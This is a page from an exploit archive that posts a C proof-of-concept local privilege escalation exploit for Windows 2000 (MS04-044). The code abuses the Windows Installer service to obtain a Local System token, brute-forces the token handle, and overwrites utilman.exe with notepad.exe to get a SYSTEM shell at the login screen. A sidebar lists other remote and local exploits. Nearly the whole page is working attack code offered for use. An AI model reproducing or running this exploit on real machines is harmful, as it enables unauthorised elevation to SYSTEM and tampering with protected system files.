exploits , vulnerabilities , articles , Microsoft Windows Improper Token Validation Local Exploit (MS04-044)

2005-01-11

Microsoft Windows Improper Token Validation Local Exploit (MS04-044)

CAN-2004-0894 : Windows 2000, Windows XP and Win Server 2003 are
vulnerable

// Impersonation POC Exploit
// Works on Win2k all service packs
// by Cesar Cerrudo (sqlsec>at<yahoo>dot<com)
// http://www.microsoft.com/technet/security/bulletin/MS04-044.mspx
// (*1*) If it doesn't work try again and research yourself. Don't ask
me.

#include "stdafx.h"
#include "windows.h"
#include "stdio.h"


#define INFO_BUFFER_SIZE MAX_COMPUTERNAME_LENGTH + 1
#define PATH_SIZE INFO_BUFFER_SIZE + MAX_PATH + 4
typedef UINT (WINAPI* PFnMsiInstallProduct)(LPCSTR szPackagePath, LPCSTR
szCommandLine);


int main(int argc, char* argv[])
{
HANDLE hToken,hThread;
HMODULE hMsi = 0;
CHAR infoBuf[INFO_BUFFER_SIZE];
DWORD bufCharCount = INFO_BUFFER_SIZE;
CHAR file1[PATH_SIZE]="\\\\";
CHAR file2[PATH_SIZE]="\\\\";
CHAR file3[PATH_SIZE]="\\\\";

//Get name of the computer. 
GetComputerName(infoBuf, &bufCharCount);

hThread=GetCurrentThread();
hMsi = LoadLibrary("msi.dll");

//Invoke windows installer service in order to steal a Local System
account identity token.
//Curious? some internal LPC magic here, see *1*
PFnMsiInstallProduct MsiInstallProduct = 0;
MsiInstallProduct = (PFnMsiInstallProduct)GetProcAddress(hMsi,
"MsiInstallProductA");
MsiInstallProduct("","");

//Get Local System account identity token and set it to current thread
hToken=(void*)0x1;
while(SetThreadToken(&hThread,hToken)==NULL){
hToken=(void*)((int)hToken+1);
}

strcat(file1,infoBuf);
strcat(file1,"\\C$\\winnt\\system32\\utilman.exe");

strcat(file2,infoBuf);
strcat(file2,"\\C$\\winnt\\system32\\utilmanback.exe");

strcat(file3,infoBuf);
strcat(file3,"\\C$\\winnt\\system32\\notepad.exe");

//Replace Utility Manager with Notepad impersonating Local System account
//BTW: fuck Windows file protection :)
if(!CopyFile(file1,file2, TRUE))
printf("CopyFile() failed: %d\n", GetLastError());
else
if(!CopyFile(file3,file1, FALSE))
printf("CopyFile() failed: %d\n", GetLastError());
else {
printf("\nPress WinKey+U to run Notepad as Local System\n");
printf("Remember to restore original utilman.exe from
utilmanback.exe\n");
}

Sleep(5000);
return 0;
}


securitydot.net - 2005-01-11

Exploits - newest 10 RSS | More

2007-06-15 57314 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34230 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42468 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29353 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19787 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16723 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19428 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16608 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33631 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17247 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit